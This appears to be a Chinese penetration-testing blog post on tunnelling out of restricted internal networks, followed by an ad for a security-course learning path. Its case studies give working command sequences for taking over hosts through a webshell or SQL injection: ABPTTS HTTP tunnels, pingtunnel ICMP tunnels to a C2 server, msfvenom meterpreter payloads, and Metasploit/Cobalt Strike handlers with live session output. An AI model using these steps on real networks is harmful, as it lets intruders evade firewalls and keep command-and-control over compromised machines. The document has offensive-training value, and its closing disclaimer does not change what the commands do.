wap网站在线生成app,兰州公司网站建设,手机做兼职的网站有哪些,wordpress 5.2.2中文版一、前言 网络上关于内网穿透的文章很多#xff0c;但大部分都是侧重于工具的使用#xff0c;原理提及较少。本文将从内网穿透的原理开始探讨#xff0c;根据不同的内网出网入网情况#xff0c;灵活设计对应的内网穿透方案。 二、内网穿透原理 内网穿透是:利用各种隧道技…一、前言网络上关于内网穿透的文章很多但大部分都是侧重于工具的使用原理提及较少。本文将从内网穿透的原理开始探讨根据不同的内网出网入网情况灵活设计对应的内网穿透方案。二、内网穿透原理内网穿透是:利用各种隧道技术以网络防火墙允许的协议绕过网络防火墙的封锁实现访问被封锁的目标网络。什么是隧道技术呢我们看一下百科词条的解释隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息从而使封装的负载数据能够通过互联网络传递。被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道。一旦到达网络终点数据将被解包并转发到最终目的地。注意隧道技术是指包括数据封装、传输和解包在内的全过程。我们进行内网渗透常用的隧道技术有dns隧道、http隧道、ssh隧道、icmp隧道等容易被网络防火墙放行的协议。这些隧道技术可以按所处的协议层分层。网络层隧道ICMP隧道等传输层隧道TCP隧道、UDP隧道应用层隧道HTTP、DNS、SSH等隧道内网主机所有可能的出网方式允许ICMP协议出网网络防火墙允许ICMP协议出网即能ping通外网主机一般都能出网允许特定的TCP或UDP协议端口出网网络防火墙允许特定的TCP或者UDP端口出网比如连接外网的22、53、80、443、3389等常见应用的默认监听端口。在一个不能出网的网络环境里面将所有的TCP和UPD端口都探测一遍通常都能发现有一两个常见的端口能出网。这通常是由于网络管理员的错误配置和偷懒行为导致。比如配置的防火墙规则前后矛盾解析的时候遇到匹配规则就退出执行比如网络管理员配置允许web服务器访问另一子网的mysql数据库的3306端口。网络管理员配置时偷懒可能会直接放行web服务器到任意ip地址的3306端口允许特定的应用层协议出网比如HTTP、SSH、DNS等应用层协议这种网络防火墙能识别应用层的协议放行允许出网的协议比如HTTP、SSH、DNS、RDP等应用层协议;通常办公网是允许HTTP协议出网的可能会域名白名单限制内网主机所有可能的入网方式允许ICMP协议入网能ping通目标主机允许特定的TCP或UDP协议端口入网NAT端口映射公网IP端口到内网主机的服务端口比如将web服务、mysql服务NAT映射到公网允许特定的应用层协议入网这种网络防火墙能识别应用层的协议放行允许入网的协议。比如HTTP反向代理将公网收到的HTTP流量反向代理进内网主机。当前主流的入网方式通常会加层WAF审查入网流量三、内网穿透常用工具3.1、网络层隧道工具icmpsh能通过ICMP协议反弹cmd功能单一反弹回来的cmd极不稳定不推荐使用icmptunnel创建虚拟网卡通过ICMP协议传输网卡流量基于ICMP隧道的vpn需要root权限动静极大不推荐使用pingtunneltcp、udp、socks5 over ICMP速度快连接稳定跨平台client模式不需要管理员权限即可正常使用推荐使用3.2、传输层隧道工具netcat网络工具中的瑞士军刀不多介绍linux系统一般自带powercatpowershell版的netcatsocat具有记录转发流的功能方便查看转发内容需要安装netshwindows系统自带的网络配置工具lcx端口转发工具NATBypass一款lcx在golang下的实现,更好的跨平台更完善的文档iox端口转发 内网代理工具功能类似于lcx/ew简化了命令行参数支持UDP流量转发更好的跨平台。缺点不支持监听指定IP默认监听0.0.0.0:port会增大暴露风险3.3、应用层隧道工具由于应用层协议极多对应的隧道工具也很多我们常用来做隧道的协议一般是DNS、HTTP、SSH、SOCKS等dnscat2不仅可以创建DNS隧道更是C2dnscat2-powershelldnscat2的powershell客户端dns2tcpTCP over DNS,即通过DNS隧道转发TCP连接iodineIPv4 over DNS即通过DNS隧道转发IPv4数据包reGeorgSOCKS over HTTP,即通过HTTP隧道转发SOCKSNeo-reGeorg重构版reGeorg提高稳定性和可用性避免特征检测更新活跃reDuhTCP over HTTP,即通过HTTP隧道转发TCP连接隧道不稳定TunnaTCP、SOCKS over HTTP,即通过HTTP隧道转发TCP连接和SOCKS隧道不稳定ABPTTSTCP over HTTP,即通过HTTP隧道转发TCP连接,数据加密可自定义HTTP数据对抗特征检测十分优秀创建的隧道十分稳定比较遗憾的是支持的web脚本类型只有aspx和jspEarthWorm十分方便的多级SOCKS代理已经永久停止更新TermiteEarthWorm的升级版已经永久停止更新VenomVenom是一款为渗透测试人员设计的使用Go开发的多级代理工具。ssocks正向和反向的socks工具可执行文件的大小很小s5.gogo语言编写的socks服务工具良好的跨平台特性ssh本地转发ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 root192.168.1.1#ssh客户端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端再由服务端转发到114.114.114.114:9999远程转发 ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 root192.168.1.1 #ssh服务端监听127.0.0.1:7777, 将收到的tcp数据包通过连接到192.168.1.1的ssh隧道转发到ssh客户端再由ssh客户端转发到114.114.114.114:9999动态转发ssh -CNfg -D 127.0.0.1:7777 root192.168.1.1ssh客户端监听127.0.0.1:7777开启socks服务将收到的socks数据包通过连接到192.168.1.1的ssh隧道转发到ssh服务端再由ssh服务端转发到目标地址构建ssh隧道的常用参数: -C 压缩传输提高传输速度 -f 后台执行数据传输 -N 建立静默连接 -g 允许远程主机连接本地用于转发的端口 -L 本地端口转发 -R 远程端口转发 -D 动态转发即SOCKS代理 -p 指定ssh连接端口四、实战中的内网穿透案例4.1、上线零出网的内网主机实战背景获取了webshell的主机位于内网并且该内网主机icmp等网络层协议不能出网tcp和udp等传输层协议不能出网dns、http等应用层协议也不能出网唯一的数据通道是反向代理入网的web应用。方案设计利用反向代理入网的web应用所在的HTTP连接构建正向的TCP over HTTP隧道。通过这条隧道我们可以向内网主机发起tcp连接。生成bind类型的payload通过webshell上传执行就会监听一个端口我们的远控平台通过构建的TCP over HTTP隧道去连接监听的端口即可上线。能构建TCP over HTTP的隧道的工具有ABPTTS、Tunna、reDuh等由于Tunna、reDuh构建的tcp连接不稳定这里选用ABPTTS。4.1.1、上线metasploit1.通过正向的http隧道构建tcp连接# 配置abptts运行环境 # 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27 pip install httplib2 pip install pycrypto # 生成server端脚本 python abpttsfactory.py -o server # 上传server端脚本到web服务器客户端运行以下命令 python abpttsclient.py -c server/config.txt -u http://192.168.168.10/abptts.aspx -f 127.0.0.1:7777/127.0.0.1:8888 # abptts客户端监听127.0.0.1:7777通过http://192.168.168.10/abptts.aspx这个http隧道将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:88882.生成bind类型的payload通过webshell上传执行# 这里的rhost和lport是转发的目的IP和端口 msfvenom -p windows/meterpreter/bind_tcp rhost127.0.0.1 lport8888 -f exe -o meterpreter.exe3.启动msf监听等待meterpreter执行上线#这里的rhost和lport是abptts客户端监听的IP和端口msf所在主机必须能访问到这个IP和端口这里msf和abptts在同一个主机上 msf5 use exploit/multi/handler msf5 exploit(multi/handler) set payload windows/meterpreter/bind_tcp payload windows/meterpreter/bind_tcp msf5 exploit(multi/handler) set rhost 127.0.0.1 rhost 127.0.0.1 msf5 exploit(multi/handler) set lport 7777 lport 7777 msf5 exploit(multi/handler) run [*] Started bind TCP handler against 127.0.0.1:7777 [*] Sending stage (180291 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (0.0.0.0:0 - 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400 meterpreter getuid Server username: DESKTOP-0AH7FQ0\admin4.1.2、上线cobaltstrike由于cobaltstrike的bind类型的监听器仅有beacon TCP和beacon SMB并且都必须连接到父beacon无法直接连接cobalstrike服务端所以我们需要一个父beacon来中转连接。1.通过正向的http隧道构建tcp连接# 配置abptts运行环境 # 注意windows安装pycrypto库需要先安装依赖http://aka.ms/vcpython27 pip install httplib2 pip install pycrypto # 生成server端脚本 python abpttsfactory.py -o server # 上传server端脚本到web服务器客户端运行以下命令 python abpttsclient.py -c server/config.txt -u http://192.168.168.121/abptts.aspx -f 127.0.0.1:7777/127.0.0.1:8888 # abptts客户端监听127.0.0.1:7777通过http://192.168.168.121/abptts.aspx这个http隧道将tcp连接127.0.0.1:7777转发到web服务器网络下的127.0.0.1:88882.创建反向的listener3.生成父beacon4.上传父beacon到abptts客户端执行上线5.创建payload为tcp beacon的listener6.生成stageless的子beacon7.将生成的子beacon通过webshell上传执行# 可以通过webshell查看网络监听确保子beacon执行成功 netstat -ano | findstr 127.0.0.1:88888.在父beacon中连接abptts的监听ip和端口9.成功上线不能出网的webshell内网主机4.2、上线仅icmp协议出网的内网主机实战背景通过某种信道获取了内网主机的shell但是当前信道不适合做远控的通信信道比如站库分离的网站我们通过sql注入获取了数据库服务器的shell但是数据库服务器只有icmp协议可以出网tcp和udp等传输层协议不能出网dns、http等应用层协议也不能出网只有icmp协议可以出网。方案设计icmp协议可以出网可以利用icmp协议构建反向的TCP over ICMP隧道或者SOCKS over ICMP隧道上线远控平台。搭建隧道的工具使用pingtunnel它能通过icmp隧道转发tcp、udp、socks5连接。4.2.1、icmp隧道转发tcp上线metasploit1.准备好一个具有公网ip的服务器root权限运行以下命令启动ICMP隧道服务端./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端即需要通过ICMP隧道上线的主机执行以下命令即可成功创建反向ICMP隧道pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1 # 该命令的意思是icmp客户端监听127.0.0.1:9999通过连接到icmpserver_ip的icmp隧道将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:77773.生成反向payload的meterpreter并上传到ICMP隧道客户端执行即可上线msfvenom -p windows/meterpreter/reverse_https lhost127.0.0.1 lport9999 -f exe -o meterpreter.exe # 这里的lhost和lport为icmp客户端监听ip和端口4.启动msf监听等待meterpreter执行上线# 这里的lhost和lport为icmp客户端转发到的ip和端口 msf5 use exploit/multi/handler msf5 exploit(multi/handler) set payload windows/meterpreter/reverse_https payload windows/meterpreter/reverse_https msf5 exploit(multi/handler) set lhost 0.0.0.0 lhost 0.0.0.0 msf5 exploit(multi/handler) set lport 7777 lport 7777 msf5 exploit(multi/handler) run [*] Started HTTPS reverse handler on https://0.0.0.0:7777 meterpreter getuid Server username: DESKTOP-test0\admin4.2.2、icmp隧道转发socks上线metasploit1.准备好一个具有公网ip的服务器root权限运行以下命令启动ICMP隧道服务端./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端即需要通过ICMP隧道上线的主机执行以下命令即可成功创建反向ICMP隧道pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务通过连接到icmpserver_ip的icmp隧道由icmpserver转发socks5代理请求到目的地址3.生成支持socks5代理的反向payload的meterpreter并上传到ICMP隧道客户端执行即可上线msfvenom -p windows/meterpreter/reverse_https LHOSTc2_server_ip LPORT8443 HttpProxyTypeSOCKS HttpProxyHost127.0.0.1 HttpProxyPort6688 -f exe -o meterpreter.exe4.启动msf监听等待meterpreter执行上线msf5 use exploit/multi/handler msf5 exploit(multi/handler) set payload windows/meterpreter/reverse_https payload windows/meterpreter/reverse_https msf5 exploit(multi/handler) set lhost 0.0.0.0 lhost 0.0.0.0 msf5 exploit(multi/handler) set lport 8443 lport 8443 msf5 exploit(multi/handler) run [*] Started HTTPS reverse handler on https://0.0.0.0:8443 meterpreter getuid Server username: DESKTOP-test0\admin4.2.3、icmp隧道转发tcp上线cobaltstrike1.准备好一个具有公网ip的服务器root权限运行以下命令启动ICMP隧道服务端./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端即需要通过ICMP隧道上线的主机执行以下命令即可成功创建反向ICMP隧道pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:9999通过连接到icmpserver_ip的icmp隧道将127.0.0.1:9999收到的tcp数据包转发到c2_server_ip:77773.cobaltstrike创建listener# https host和https port(c2)为icmp隧道客户端的监听ip和端口 # https port(bind)为转发目的地址的端口4.生成反向payload的beacon5.上传生成的beacon到ICMP隧道客户端执行成功通过反向ICMP隧道上线4.2.4、icmp隧道转发socks上线cobaltstrike1.准备好一个具有公网ip的服务器root权限运行以下命令启动ICMP隧道服务端./pingtunnel -type server -noprint 1 -nolog 12.ICMP隧道客户端即需要通过ICMP隧道上线的主机执行以下命令即可成功创建反向ICMP隧道pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1 # 该命令的意思是icmp隧道客户端监听127.0.0.1:6688启动socks5服务通过连接到icmpserver_ip的icmp隧道由icmpserver转发socks5代理请求到目的地址3.cobaltstrike创建listener# 这里的代理可以是socks或者http # 好像cobaltstrike不支持socks5代理这里并不能成功上线 # 这里也可以使用http代理不过需要工具将http代理转为socks5代理比如privoxy4.选择创建的listener生成beacon上传到目标执行即可上线五、总结内网渗透中内网穿透的本质无非是通过各种通信信道无论是正向的还是反向的实现传输层协议tcp/udp数据包的转发应用层协议都是基于传输层的协议实现的。比如ABPTTS SOCKS服务 reGeorg**内网渗透中的内网穿透的条件能通过某种通信信道远程代码执行。如果能通过某种通信信道远程代码执行一定可以通过这种通信信道实现tcp/udp数据包的转发即TCP/UDP over something隧道。如果没有现成的工具可能需要我们自己开发。**比如通过sql注入获取了shell我们也可以利用这条通信信道转发tcp/udp数据包没有现成的工具需要我们开发工具而已隧道客户端将tcp/udp数据包封装写进数据库再由隧道服务端从数据库中读出封装的数据包解包发往对应地址即可网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失